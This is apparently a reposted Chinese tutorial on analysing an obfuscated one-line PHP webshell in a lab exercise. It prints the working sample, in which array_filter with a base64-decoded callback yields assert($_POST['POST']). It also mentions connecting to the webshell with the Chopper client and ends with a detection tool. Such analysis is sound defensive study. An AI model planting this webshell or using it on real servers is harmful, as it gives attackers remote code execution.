WebShell代碼分析溯源(五)
一、一句話變形馬樣本
<?php $e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e)); ?>
二、代碼分析
1、調整代碼格式

2、分析代碼
首先使用REQUEST方法接收url中e引數傳遞的值,然后把$_POST['POST']賦值給arr陣列,然后把arr陣列中的每個鍵值傳給base64_decode函式,最終構成一句話木馬assert($_post['post'])
注: array_filter() 函式用回呼函式過濾陣列中的值
三、漏洞環境搭建
1、這里使用在線學習平臺墨者學院中的實驗環境(WebShell代碼分析溯源(第4題)),地址: https://www.mozhe.cn/bug/detail/ZVNlS096cEV0WHZsTzdKNHBKZXljUT09bW96aGUmozhe
2、代碼環境,下載代碼

3、分析(上面已經分析過了)
4、使用菜刀連接
5、執行一些命令


四、后記
學習常用webshell掃描檢測查殺工具---牧云(CloudWalker)(百度WebShell掃描檢測引擎),網址: https://github.com/chaitin/cloudwalker
使用牧云進行webshell查殺
1、通過命令檢測

2、輸出檢測報告


轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/175730.html
標籤:其他
